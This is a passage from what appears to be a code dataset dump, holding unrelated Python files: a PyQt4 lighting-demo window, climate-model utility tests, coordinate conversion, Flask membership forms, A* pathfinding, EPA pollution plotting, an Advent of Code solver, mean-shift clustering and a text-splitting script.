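    if math.isinf(r2):
        return r1
    if r1 == 0 or r2 == 0:
        return 0.0  # a short circuit dominates
    return (r1 * r2) / (r1 + r2)

def floyd_warshall_resistance(matr):
    # Same update as the inline loop in compare.py: the direct path i -> j
    # in parallel with the series path i -> k -> j.
    n = len(matr)
    for k in range(n):
        for i in range(n):
            for j in range(n):
                matr[i][j] = parallel(matr[i][j], matr[i][k] + matr[k][j])
    return matr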
Le but est de tester leurs aspects positifs et négatifs et de voir les conditions dans lesquelles ils donnent le meilleur rendu.\")\n\n def initMenu(self):\n \"\"\" This method will initate the menu \"\"\"\n menubar = self.menuBar()\n fileMenu = menubar.addMenu('&Fichier')\n helpMenu = menubar.addMenu(\"&Aide\")\n\n exitAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" + \"images/application-exit.png\"), 'Quitter', self)\n exitAction.setShortcut('Ctrl+Q')\n exitAction.setStatusTip('Exit application')\n exitAction.triggered.connect(self.closeApp)\n fileMenu.addAction(exitAction)\n\n aboutAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" + \"images/help-browser.png\"), \"Aide\", self)\n aboutAction.setStatusTip(\"Aide pour cette application\")\n aboutAction.triggered.connect(self.displayHelp)\n helpMenu.addAction(aboutAction)\n\n aboutAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" + \"images/dialog-information.png\"), \"A propos\", self)\n aboutAction.setStatusTip(\"A propos de cette application\")\n aboutAction.triggered.connect(self.displayAbout)\n helpMenu.addAction(aboutAction)\n\n def reloadOpenGl(self):\n \"\"\" \"\"\"\n self._controller.reload()\n\n def addALight(self):\n \"\"\" \"\"\"\n self.l = AddLightPanel(self._controller)\n\n def algoOption(self):\n self.o = AlgoPanel(self._controller)\n\n def removeALight(self):\n \"\"\" \"\"\"\n self.l = RemoveLightPanel(self._controller)\n\n\n def animateLight(self):\n \"\"\" \"\"\"\n self._controller.switchLightAnimation()\n\n def animateCamera(self):\n \"\"\" \"\"\"\n self._controller.switchCameraAnimation()\n\n\n def showHardwareVersion(self):\n \"\"\" Display opengl and shading version\"\"\"\n helper = self._controller.getOpenGlVersionHelper()\n vendor = helper.getVendor()\n renderer = helper.getRenderer()\n shadingVersion = helper.getShadingVersion()\n openglVersion = helper.getOpenGlVersion()\n if isinstance(shadingVersion, str) and isinstance(openglVersion, str):\n QtGui.QMessageBox.information(self,\"Materiel graphique\",\"Vendeur : \" + vendor + \"\\n\" + \"Renderer : \" + renderer + \"\\n\" + \"OpenGL : \" + openglVersion + \"\\n\" + \"GLSL : \" + shadingVersion)\n else:\n print(\"GLShadow not initialized\")\n\n def onTypeSelection(self,lampe):\n \"\"\" \"\"\"\n self._controller.getLightCollection().setSelection((int(lampe[-1])-1))\n\n\n def initToolsBar(self):\n \"\"\" This method will initate the toolsBar\"\"\"\n self.toolbar = self.addToolBar(\"Tool Bar\")\n\n exitAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/application-exit.png\"), \"Exit\", self)\n exitAction.setShortcut(\"Ctrl+Q\")\n exitAction.setStatusTip(\"Quitter l'application\")\n exitAction.triggered.connect(self.closeApp)\n self.toolbar.addAction(exitAction)\n\n reloadAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/system-reload.png\"), \"Reload\", self)\n reloadAction.setShortcut(\"Ctrl+R\")\n reloadAction.setStatusTip(\"Recharge l'algorithme\")\n reloadAction.triggered.connect(self.reloadOpenGl)\n self.toolbar.addAction(reloadAction)\n\n self.toolbar.addSeparator()\n\n hardwareHelpAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/hwinfo.png\"), \"Montre la version du hardware graphique\", self)\n hardwareHelpAction.setStatusTip(\"Caractéristiques de la machine\")\n hardwareHelpAction.triggered.connect(self.showHardwareVersion)\n self.toolbar.addAction(hardwareHelpAction)\n\n\n self.toolbar.addSeparator()\n\n\n animationActionCamera = 
QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/tool-animator-camera.png\"), \"Animation de la camera\", self)\n animationActionCamera.setStatusTip(\"Animation de la camera\")\n animationActionCamera.triggered.connect(self.animateCamera)\n self.toolbar.addAction(animationActionCamera)\n\n\n\n\n self.toolbar.addSeparator()\n\n addLightAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/lightBublePlus.png\"), \"Light+\", self)\n addLightAction.setStatusTip(\"Ajouter une lampe\")\n addLightAction.triggered.connect(self.addALight)\n self.toolbar.addAction(addLightAction)\n\n\n removeLightAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/lightBubleMinus.png\"), \"Light-\", self)\n removeLightAction.setStatusTip(\"Retirer une lampe\")\n removeLightAction.triggered.connect(self.removeALight)\n self.toolbar.addAction(removeLightAction)\n\n\n\n self.toolbar.addSeparator()\n self.toolbar.addSeparator()\n\n lightCollection = self._controller.getLightCollection()\n if len(lightCollection) > 0:\n self._choiceType = \"0 Default\"\n combo = QtGui.QComboBox(self)\n for lightIndex in range(len(lightCollection)):\n string = \"Lampe \"+ str(lightIndex+1)\n \n combo.addItem(string)\n combo.activated[str].connect(self.onTypeSelection)\n \n self.toolbar.addWidget(combo)\n\n self.toolbar.addSeparator()\n\n animationActionLight = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/tool-animator-light.png\"), \"Animation des lampes\", self)\n animationActionLight.setStatusTip(\"Animation des lampes\")\n animationActionLight.triggered.connect(self.animateLight)\n self.toolbar.addAction(animationActionLight)\n\n self.toolbar.addSeparator()\n\n\n textWidget = QtGui.QLabel(self)\n textWidget.setText(\"Position lumière : X \".decode(\"utf8\"))\n self.toolbar.addWidget(textWidget)\n\n\n sliderX = QtGui.QSlider(QtCore.Qt.Horizontal, self)\n sliderX.valueChanged.connect(self._controller.lightPercentX)\n sliderX.setSliderPosition(99)\n self.toolbar.addWidget(sliderX)\n\n\n textWidget = QtGui.QLabel(self)\n textWidget.setText(\" Z \")\n self.toolbar.addWidget(textWidget)\n\n sliderZ = QtGui.QSlider(QtCore.Qt.Horizontal, self)\n sliderZ.valueChanged.connect(self._controller.lightPercentZ)\n sliderZ.setSliderPosition(99)\n self.toolbar.addWidget(sliderZ)\n\n\n textWidget = QtGui.QLabel(self)\n textWidget.setText(\" Hauteur \")\n self.toolbar.addWidget(textWidget)\n\n sliderY = QtGui.QSlider(QtCore.Qt.Horizontal, self)\n sliderY.valueChanged.connect(self._controller.lightPercentY)\n sliderY.setSliderPosition(99)\n self.toolbar.addWidget(sliderY)\n\n\n self.toolbar.addSeparator()\n algoOptionAction = QtGui.QAction(QtGui.QIcon(os.getcwd() + \"/assets/\" +\"images/configure.png\"), \"Option algo\", self)\n algoOptionAction.setStatusTip(\"Options de l'algorithme\")\n algoOptionAction.triggered.connect(self.algoOption)\n self.toolbar.addAction(algoOptionAction)\n\n # un espace blanc\n textWidget = QtGui.QLabel(self)\n textWidget.setText(\" \"* 10)\n self.toolbar.addWidget(textWidget)\n\n\n def updateToolsBar(self):\n \"\"\" \"\"\"\n self.toolbar.hide()\n self.initToolsBar()\n \n \n","sub_path":"src/GUI/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":9250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"412111030","text":"from climt import (\n mass_to_volume_mixing_ratio,\n get_interface_values,\n calculate_q_sat)\n\nfrom sympl import DataArray\nimport numpy as np\nimport 
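[Editor's note] MainWindow.py repeats the same four-step QAction setup (icon, status tip, signal, toolbar) a dozen times; a small factory would shrink initToolsBar and initMenu considerably. A hypothetical refactoring sketch using only PyQt4 calls already present in the file:

import os
from PyQt4 import QtGui

def make_action(parent, icon_name, label, slot, tip=None, shortcut=None):
    # Bundles the QAction boilerplate repeated throughout initToolsBar/initMenu.
    icon = QtGui.QIcon(os.path.join(os.getcwd(), "assets", "images", icon_name))
    action = QtGui.QAction(icon, label, parent)
    if shortcut:
        action.setShortcut(shortcut)
    if tip:
        action.setStatusTip(tip)
    action.triggered.connect(slot)
    return action

# e.g. inside MainWindow.initToolsBar:
#   self.toolbar.addAction(make_action(self, "application-exit.png", "Exit",
#                                      self.closeApp, "Quitter l'application", "Ctrl+Q"))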
pytest\n\n\ndef test_mol_weight_not_passed():\n\n with pytest.raises(ValueError) as excinfo:\n mass_to_volume_mixing_ratio(None)\n\n assert 'molecular weight' in str(excinfo.value)\n\n\ndef test_for_365ppm():\n\n mass_mixing_ratio_co2 = 605e-6\n molecular_weight_co2 = 48\n\n expected_vol_mixing_ratio = 365.0670833333333e-6\n\n co2 = DataArray(\n mass_mixing_ratio_co2*np.ones((1, 1, 1)),\n dims=['longitude', 'latitude', 'mid_levels'],\n attrs=dict(units='g/g'))\n\n vol_mixing_ratio = mass_to_volume_mixing_ratio(\n co2, molecular_weight=molecular_weight_co2)\n\n assert np.all(np.isclose(\n vol_mixing_ratio, expected_vol_mixing_ratio))\n\n\ndef test_for_g_per_kg():\n\n mass_mixing_ratio_co2 = 605e-3\n molecular_weight_co2 = 48\n\n expected_vol_mixing_ratio = [[[365.0670833333333e-6]]]\n\n co2 = DataArray(\n mass_mixing_ratio_co2*np.ones((1, 1, 1)),\n dims=['longitude', 'latitude', 'mid_levels'],\n attrs=dict(units='g/kg'))\n\n vol_mixing_ratio = mass_to_volume_mixing_ratio(\n co2.to_units('g/g').values, molecular_weight=molecular_weight_co2)\n\n print(vol_mixing_ratio, expected_vol_mixing_ratio)\n assert np.all(np.isclose(\n vol_mixing_ratio, expected_vol_mixing_ratio))\n\n\ndef test_interface_levels():\n\n mid_level_values = np.ones((1, 1, 10))\n surface_value = np.ones((1, 1, 1))\n\n pressure_mid_level = np.linspace(0.995, 0.001, 10)[None, None, :]\n surface_pressure = 1.\n\n pressure_interface_level = np.zeros((1, 1, 11))\n\n pressure_interface_level[:, :, 1:-1] = (\n pressure_mid_level[:, :, 1::] + pressure_mid_level[:, :, :-1])/2.\n\n pressure_interface_level[:, :, 0] = surface_pressure\n pressure_interface_level[:, :, -1] = 0.0005\n\n interface_values = get_interface_values(\n mid_level_values, surface_value,\n pressure_mid_level, pressure_interface_level)\n\n assert np.all(interface_values == np.ones((1, 1, 11)))\n\n\ndef test_qsat():\n\n surf_temp = 290*np.random.randn(10, 10)\n surf_temp[surf_temp < 260] = 260\n surf_temp[surf_temp > 280] = 280\n\n qsat_at_280 = 0.0062856560708380816\n qsat_at_260 = 0.0012408979354134003\n\n surf_press = 1e5*np.ones(surf_temp.shape)\n\n Rd = 287.058 # J/kg/K\n Rv = 461.5 # J/kg/K\n\n qsat = calculate_q_sat(surf_temp, surf_press, Rd, Rv)\n\n assert np.all(qsat[surf_temp == 280] == qsat_at_280)\n assert np.all(qsat[surf_temp == 260] == qsat_at_260)\n\n\nif __name__ == '__main__':\n pytest.main([__file__])\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"246485476","text":"\"\"\"\nCoordinate conversions with the pyast Python package.\n\nhttps://github.com/timj/starlink-pyast\nhttp://dsberry.github.com/starlink/pyast.html\n\"\"\"\nimport numpy as np\nimport starlink.Ast as Ast\n\nSUPPORTED_SYSTEMS = 'fk5 fk4 icrs galactic ecliptic'.split()\n\ndef get_frame(system):\n \"\"\"Convert generic system specification tags to pyast.SkyFrame\"\"\"\n # Create a Frame to describe J2000 FK5 coordinates, and another that\n # will be used in turn to describe each of the output coordinate systems.\n # Assume that the epoch of observation is J2000.0. 
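[Editor's note] The expected value in test_for_365ppm is consistent with the standard conversion volume_mixing_ratio = mass_mixing_ratio * M_air / M_gas, taking M_air ≈ 28.964 g/mol for dry air (an assumed constant, not shown in the test file). A quick check:

mass_mixing_ratio = 605e-6     # g/g, as in the test
molecular_weight_gas = 48.0    # g/mol, as in the test
molecular_weight_air = 28.964  # g/mol, assumed value for dry air
print(mass_mixing_ratio * molecular_weight_air / molecular_weight_gas)
# -> 3.650670833...e-04, i.e. the 365.0670833333333e-6 asserted above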
The default values for\n # the reference equinox will be used (J2000.0 for FK5 and ecliptic, and\n # B1950.0 for FK4).\n d = dict()\n d['fk5'] = 'FK5'\n d['fk4'] = 'FK4'\n d['galactic'] = 'Galactic'\n d['ecliptic'] = 'Ecliptic'\n d['icrs'] = 'ICRS'\n return Ast.SkyFrame('System=%s,Format(1)=hms.5,Format(2)=dms.5,Epoch=2000.0' % d[system])\n\ndef convert(coords, systems):\n \"\"\"Convert an array of in_coords from in_system to out_system\"\"\"\n\n if not set(systems.values()).issubset(SUPPORTED_SYSTEMS):\n return None\n\n in_frame, out_frame = get_frame(systems['in']), get_frame(systems['out'])\n frameset = in_frame.convert(out_frame)\n lon, lat = np.radians(coords['lon']), np.radians(coords['lat'])\n coords = frameset.tran([lon, lat])\n coords = np.degrees(coords.T)\n return dict(lon=coords[:,0], lat=coords[:,1])\n","sub_path":"tools/pyast/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"339276936","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n File name: vip.py\n Function Des: VIP表单\n ~~~~~~~~~~\n\n author: Jerry \n\n\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom flask_wtf import Form\nfrom wtforms import StringField, DateTimeField\nfrom wtforms.validators import DataRequired, Length, Regexp\nfrom mongoengine import Q\n\nfrom WebApp.main.models import VipUser\n\n\nclass VipAddForm(Form):\n username = StringField(\n '账号', validators=[\n DataRequired(message=\"账号不能为空\"),\n Length(min=3, max=5, message=\"账号长度必须在3-5之间\"),\n Regexp(r'^[a-z0-9A-Z]+$', message='仅可使用字母或数字'),\n ], description='输入账号',\n )\n\n name = StringField(\n '名字', validators=[\n DataRequired(message=\"昵称不能为空\"),\n Length(min=1, max=20, message=\"长度必须在1-20位之间\")\n ], description='输入姓名',\n )\n\n phone = StringField(\n '电话号码', validators=[\n DataRequired(message=\"电话不能为空\"),\n Length(min=6, max=15, message=\"长度必须在6-15位之间\")\n ], description='输入电话',\n )\n\n def save(self):\n vip = VipUser(\n username=self.username.data,\n name=self.name.data,\n phone=self.phone.data,\n )\n vip.save()\n return vip\n\n\nclass VipFilterForm(Form):\n name = StringField('名字')\n\n phone = StringField('电话号码')\n\n def filter(self):\n name = self.name.data\n phone = self.phone.data\n if not name and not phone:\n vips = VipUser.objects()\n elif not name:\n vips = VipUser.objects(phone=phone)\n elif not phone:\n vips = VipUser.objects(name=name)\n else:\n vips = VipUser.objects(Q(phone=phone) & Q(name=name))\n return vips\n\n\nclass VipRemoveForm(Form):\n username = StringField()\n\n def remove(self):\n vip = VipUser.objects(username=self.username.data)\n return vip.delete()\n\n\nclass VipModifyForm(Form):\n name = StringField(\n '名字', validators=[\n DataRequired(message=\"昵称不能为空\"),\n Length(min=1, max=20, message=\"长度必须在1-20位之间\")\n ], description='输入姓名',\n )\n\n phone = StringField(\n '电话号码', validators=[\n DataRequired(message=\"电话不能为空\"),\n Length(min=6, max=15, message=\"长度必须在6-15位之间\")\n ], description='输入电话',\n )\n username = StringField('账号') # 不能修改\n register_time = DateTimeField('注册时间') # 不能修改\n\n def modify(self):\n vip = VipUser.objects(username=self.username.data).first()\n if vip is None:\n raise ValueError('该会员已被删除')\n vip.update(\n name=self.name.data,\n phone=self.phone.data,\n )\n 
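[Editor's note] convert() above takes the system tags as a dict keyed by the strings 'in' and 'out'; note that dict(in=...) would be a SyntaxError, since `in` is a Python keyword, so a dict literal is required. A hypothetical call using M31's ICRS position:

import numpy as np
coords = dict(lon=np.array([10.68458]), lat=np.array([41.26917]))  # M31, degrees
result = convert(coords, {'in': 'icrs', 'out': 'galactic'})
# result['lon'], result['lat'] are Galactic l, b in degrees
# (roughly 121, -22 for M31)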
vip.save()\n","sub_path":"WebApp/main/forms/vip.py","file_name":"vip.py","file_ext":"py","file_size_in_byte":2999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"519054677","text":"import math\n\nfrom collections import defaultdict\nfrom functools import partial\n\nfrom scripts.src.pathfinding.pathfinding_algorithm import PathfindingAlgorithm\nfrom scripts.src.pathfinding.path_not_found_exception import PathNotFoundException\nfrom scripts.src.pathfinding.tile_role import TileRole\nfrom scripts.src.pathfinding.config import NODE_SIZE\n\n\nclass AStar(PathfindingAlgorithm):\n \"\"\"https://en.wikipedia.org/wiki/A*_search_algorithm#Pseudocode\"\"\"\n def find_path(self, start, end):\n heuristic = partial(distance, point2=end.pixel_coordinates_center)\n openSet = {start}\n cameFrom = {}\n gScore = defaultdict(lambda: float('inf'))\n gScore[start] = 0\n\n fScore = defaultdict(lambda: float('inf'))\n fScore[start] = heuristic(start.pixel_coordinates_center)\n\n while openSet:\n openSet_fScores = {\n node: fScore[node] for node in openSet\n }\n\n current = min(openSet_fScores.items(), key=lambda x: x[1])[0]\n\n if distance(current.pixel_coordinates_center,\n end.pixel_coordinates_center) \\\n < NODE_SIZE:\n return reconstruct_path(cameFrom, current)\n\n openSet.remove(current)\n for neighbor, _ in current.neighbors:\n\n if neighbor.role is TileRole.EMPTY or \\\n neighbor.role is TileRole.END or \\\n neighbor.role is TileRole.START:\n tentative_gScore = gScore[current] + 1\n else:\n tentative_gScore = float('inf')\n\n if tentative_gScore < gScore[neighbor]:\n cameFrom[neighbor] = current\n gScore[neighbor] = tentative_gScore\n fScore[neighbor] = gScore[neighbor] + \\\n heuristic(neighbor.pixel_coordinates_center)\n if neighbor not in openSet:\n openSet.add(neighbor)\n\n raise PathNotFoundException()\n\n\ndef distance(point1, point2):\n x1, y1 = point1\n x2, y2 = point2\n return math.sqrt(pow(x2-x1, 2) + pow(y2-y1, 2))\n\n\ndef reconstruct_path(cameFrom, current):\n total_path = [current]\n while current in cameFrom.keys():\n current = cameFrom[current]\n total_path.append(current)\n return total_path[::-1]\n","sub_path":"scripts/src/pathfinding/a_star.py","file_name":"a_star.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"337595452","text":"__author__ = 'Ben'\nimport pandas as pd\nimport numpy as np\nfrom pandas import DataFrame\nimport datetime\nimport pandas.io.data\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib.pyplot import text\nfrom numpy import arange\n#import geopandas.geoseries as gp\n\n\nmatplotlib.style.use('ggplot')\n\n\nimport glob\n\n\npath='C:\\Rdcep Github\\Ben Git Stuff\\DataFilesPM2'\npath2 ='C:\\Rdcep Github\\EPADataFiles\\DataFilesPM2.csv'\n\nallFiles = glob.glob(path + \"/*.csv\")\nlist=[]\ninteger=0\nfor file in allFiles:\n if integer<=50:\n\n df = pd.read_csv(file)# index_col=0)# header=0,)#parse_dates=['Date'])\n list.append(df)\n integer+=1\n frame=pd.concat(list)\n frame['Type']=['Air-PM2']*len(frame.index)\n frame.to_csv(path=path2)\n\n #df2=gp.from_file()\n df = pd.read_csv(file)# index_col=0)# header=0,)#parse_dates=['Date'])\n print(df.index)\n list.append(df)\n integer+=1\n\n\n\n\nfor frame in list:\n year=frame['Date'][5][-4:]\n plt.ylim([0, .2])\n frame=frame.sort_index(by=['Date'], ascending=[True])\n frame.plot(label=\"Measured CO Level\", y='Daily Max 8-hour CO Concentration', 
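[Editor's note] reconstruct_path in a_star.py walks the cameFrom chain backwards from the goal and then reverses the list; a tiny illustration with plain strings standing in for nodes:

came_from = {"B": "A", "C": "B"}   # the chain A -> B -> C
assert reconstruct_path(came_from, "C") == ["A", "B", "C"]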
x='Date')\n plt.title(\"Daily Carbon Monoxide Levels for Year {0}\".format(str(year))+\" in Cook County, IL\")\n plt.xlabel('Date')\n plt.ylabel('CO Concentration in Air Close to Surface (ppm)')\n plt.yticks(arange(0,20,1))\n plt.axhline(y=15, xmin=0, xmax=1, linewidth=2, color = 'b',label='Dangerous CO Level')\n plt.legend()\nplt.show()\n\n","sub_path":"2015 Rdcep Intern Ben EPA/CO/COEveryYearSeperate.py","file_name":"COEveryYearSeperate.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"62994454","text":"from collections import Counter\n\ndata = []\n\ndef yy():\n return open('input.txt')\ndef xx():\n return filter(None, \"\"\"\nbe cfbegad cbdgef fgaecd cgeb fdcge agebfd fecdb fabcd edb | fdgacbe cefdb cefbgd gcbe\nedbfga begcd cbg gc gcadebf fbgde acbgfd abcde gfcbed gfec | fcgedb cgb dgebacf gc\nfgaebd cg bdaec gdafb agbcfd gdcbef bgcad gfac gcb cdgabef | cg cg fdcagb cbg\nfbegcd cbd adcefb dageb afcb bc aefdc ecdab fgdeca fcdbega | efabcd cedba gadfec cb\naecbfdg fbg gf bafeg dbefa fcge gcbea fcaegb dgceab fcbdga | gecf egdcabf bgf bfgea\nfgeab ca afcebg bdacfeg cfaedg gcfdb baec bfadeg bafgc acf | gebdcfa ecba ca fadegcb\ndbcfg fgd bdegcaf fgec aegbdf ecdfab fbedc dacgb gdcebf gf | cefg dcbef fcge gbcadfe\nbdfegc cbegaf gecbf dfcage bdacg ed bedf ced adcbefg gebcd | ed bcgafe cdgba cbgef\negadfb cdbfeg cegd fecab cgb gbdefca cg fgcdab egfdb bfceg | gbdfcae bgc cg cgb\ngcafb gcf dcaebfg ecagb gf abcdeg gaef cafbge fdbac fegbdc | fgae cfgab fg bagce\n\"\"\".splitlines())\n\nfor line in yy():\n all_digits, four_display = line.split(' | ')\n all_digits = sorted([''.join(sorted(x)) for x in all_digits.split()], key=lambda x: (len(x), x))\n four_display = [''.join(sorted(d)) for d in four_display.split()]\n data.append((all_digits, four_display))\n\nSEGMENTS = {\n 0: 6,\n 1: 2,\n 2: 5,\n 3: 5,\n 4: 4,\n 5: 5,\n 6: 6,\n 7: 3,\n 8: 7,\n 9: 6,\n}\n\nSIZE = {\n 2: (1, ),\n 3: (7, ),\n 4: (4, ),\n 5: (2, 3, 5, ),\n 6: (0, 6, 9),\n 7: (8, )\n}\n\nUNIQUE_SIZE = {\n 2: 1,\n 3: 7,\n 4: 4,\n 7: 8,\n}\n\nNORMAL_OUTPUT = {\n 'cf': 1,\n \"acf\": 7,\n 'bcdf': 4,\n 'acdeg': 2,\n 'abdfg': 5,\n 'acdfg': 3,\n 'abcefg': 0,\n 'abdefg': 6,\n 'abcdfg': 9,\n 'abcdefg': 8,\n}\nALL_SEGMENTS = 'abcdefg'\n\nd = Counter()\nfor _, output_value in data:\n for digit in output_value:\n d[SIZE[len(digit)]] += 1\nprint(d[(1, )] + d[(7, )] + d[(4, )] + d[(8, )])\n\n\ndef make_code(digits):\n output_map = {}\n\n mapped_digits = {\n UNIQUE_SIZE[len(d)]: d\n for d in digits\n if len(d) in UNIQUE_SIZE\n }\n\n counter = Counter()\n\n for d in digits:\n counter.update(d)\n \n for key, value in counter.items():\n if value == 4:\n output_map[key] = 'e'\n if value == 6:\n output_map[key] = 'b'\n if value == 9:\n output_map[key] = 'f'\n\n one = mapped_digits[1]\n four = mapped_digits[4]\n seven = mapped_digits[7]\n eight = mapped_digits[8]\n \n cee = ''.join(x for x in one if output_map.get(x) != 'f')\n assert len(cee) == 1\n output_map[cee] = 'c'\n \n dee = ''.join(\n l for l in four if output_map.get(l) not in (\n 'f',\n 'b',\n 'c'\n )\n )\n assert len(dee) == 1\n output_map[dee] = 'd'\n \n aaa = ''.join(\n l for l in seven\n if output_map.get(l) not in ('c', 'f')\n )\n assert len(aaa) == 1\n output_map[aaa] = 'a'\n \n last_one = (set(ALL_SEGMENTS) - set(output_map))\n last_target = (set(ALL_SEGMENTS) - set(output_map.values()))\n assert len(last_one) == len(last_target) == 1\n output_map[last_one.pop()] = last_target.pop()\n \n code = 
{}\n for input_d in digits:\n code[input_d] = ''.join(sorted(output_map[x] for x in input_d))\n assert set(code.values()) == set(NORMAL_OUTPUT.keys())\n \n return code\n \n\nr = 0\nfor digits, output_value in data:\n code = make_code(digits)\n integer_digits = ''.join(str(NORMAL_OUTPUT[code[d]]) for d in output_value)\n print(integer_digits.lstrip('0'))\n r += int(integer_digits.lstrip('0'))\n\nprint(r)\n","sub_path":"2021/day8/day.py","file_name":"day.py","file_ext":"py","file_size_in_byte":3554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"3555927","text":"import numpy as np\r\nimport pandas as pd\r\nfrom sklearn.cluster import MeanShift\r\nfrom sklearn.datasets import make_blobs\r\nfrom matplotlib import pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom sklearn import datasets\r\nfrom dbconn import *\r\nimport json\r\n\r\nfeatures = \"sport foot stade football athletisme basketball natation cyclisme golf handball equitation judo karate marathon rugby ski taekwondo volleyball superbowl match coupe championnat attentat tremblement concert exposition explosion festival terroriste election fete cirque gala oscar cesar congre forum ceremoni convention spectacle theatr politique trianon vote election accident mort sortie album cinema film coronaviru viru maladie epidemie pandemie nouveau solde carnaval france europe monde national regionnal zenith olympia bataclan hippodrome cinema\"\r\nF = features.split(\" \")\r\n\r\ndico={}\r\n \r\n \r\nselectVectors = selectVectors()\r\nV = []\r\nfor row in selectVectors:\r\n r=row[1].split(\"ARRAY\")\r\n res = json.loads(r[1])\r\n V.append(res)\r\n\r\nv = 0\r\ni = 0\r\n\r\nfor vector in V :\r\n for feature in vector :\r\n if feature == 1 :\r\n \r\n if v in dico :\r\n dico[v] += F[i] + \" \"\r\n else :\r\n dico[v] = F[i] + \" \"\r\n i+=1\r\n v+=1\r\n i=0\r\nprint(v)\r\n\r\nX = np.array(V)\r\n\r\nms = MeanShift()\r\nms.fit(X)\r\nlabels = ms.labels_\r\ncluster_centers = ms.cluster_centers_\r\n\r\nl = list(labels)\r\n\r\nfor i in range(len(l)) :\r\n print(l[i],dico[l[i]])\r\n\r\n\"\"\"\r\nfig = plt.figure()\r\nax = fig.add_subplot(111, projection='3d')\r\nax.scatter(X[:,0], X[:,1], X[:,2], marker='o')\r\nax.scatter(cluster_centers[:,0], cluster_centers[:,1], cluster_centers[:,2], marker='x', color='red', s=300, linewidth=5, zorder=10)\r\nplt.show()\r\n\r\n\r\n##plt.scatter(X[:,0], X[:,1], s=150)\r\n##plt.show()\r\n\r\ncolors = 10*[\"g\",\"r\",\"c\",\"b\",\"k\"]\r\n\r\nclass Mean_Shift:\r\n def __init__(self, radius=4):\r\n self.radius = radius\r\n\r\n def fit(self, data):\r\n centroids = {}\r\n\r\n for i in range(len(data)):\r\n centroids[i] = data[i]\r\n \r\n while True:\r\n new_centroids = []\r\n for i in centroids:\r\n in_bandwidth = []\r\n centroid = centroids[i]\r\n for featureset in data:\r\n if np.linalg.norm(featureset-centroid) < self.radius:\r\n in_bandwidth.append(featureset)\r\n\r\n new_centroid = np.average(in_bandwidth,axis=0)\r\n new_centroids.append(tuple(new_centroid))\r\n\r\n uniques = sorted(list(set(new_centroids)))\r\n\r\n prev_centroids = dict(centroids)\r\n\r\n centroids = {}\r\n for i in range(len(uniques)):\r\n centroids[i] = np.array(uniques[i])\r\n\r\n optimized = True\r\n\r\n for i in centroids:\r\n if not np.array_equal(centroids[i], prev_centroids[i]):\r\n optimized = False\r\n if not optimized:\r\n break\r\n \r\n if optimized:\r\n break\r\n\r\n self.centroids = centroids\r\n\r\n\r\n\r\nclf = Mean_Shift()\r\nclf.fit(X)\r\n\r\ncentroids = 
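[Editor's note] make_code in day.py relies on a frequency trick: across the ten canonical seven-segment digits, segment 'e' lights 4 times, 'b' 6 times and 'f' 9 times, which identifies those three wires unambiguously. A quick verification against the NORMAL_OUTPUT table defined above:

from collections import Counter

freq = Counter()
for segments in NORMAL_OUTPUT:   # keys are the canonical segment strings
    freq.update(segments)
assert freq['e'] == 4 and freq['b'] == 6 and freq['f'] == 9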
clf.centroids\r\n\r\nplt.scatter(X[:,0], X[:,1], s=150)\r\n\r\nfor c in centroids:\r\n plt.scatter(centroids[c][0], centroids[c][1], color='k', marker='*', s=150)\r\n\r\nplt.show()\r\n\"\"\"\r\n","sub_path":"WebSensor/project/ms.py","file_name":"ms.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"155549737","text":"import json\nimport re\nimport os\nimport codecs\n\ndef write_json(dic, filename, encoding):\n dicjson=json.dumps(dic,indent=2)\n f = codecs.open(filename,\"w\",\"utf-8\")\n f.write(dicjson)\n f.close()\n\ndef separation(fichier):\n mots_uniques=[] # list de mots uniques\n f = open(\"fr/appr/\"+fichier,'r',encoding=\"utf8\")\n i=0 # id de ligne \n for ligne in f:\n #print(\"ligne \"+str(i)) \n ligne=ligne.strip() # supprimer \\n \\r et spaces en fin de ligne \n if len(ligne)==0 or ligne.isspace(): # si le ligne est vide \"\" ou si le ligne contienne sauf des espaces \n continue \n mots=ligne.split() # liste de mots dans le ligne\n for mot in mots:\n mot=mot.lower() # transformer en miniscule\n if mot not in mots_uniques:\n mot=re.sub(\"\\(\",\"\",mot)\n mot=re.sub(\"\\)\",\"\",mot)\n mot=re.sub(\"\\*\",\"\",mot)\n mot=re.sub(\"\\[\",\"\",mot)\n mot=re.sub(\"\\]\",\"\",mot)\n mot=re.sub(\"\\+\",\"\",mot)\n mot=re.sub(\"\\-\",\"\",mot)\n mot=re.sub(\"\\n\",\"\",mot)\n mots_uniques+=[mot]\n i+=1 \n return mots_uniques\n\ndef concordation(nombre):\n 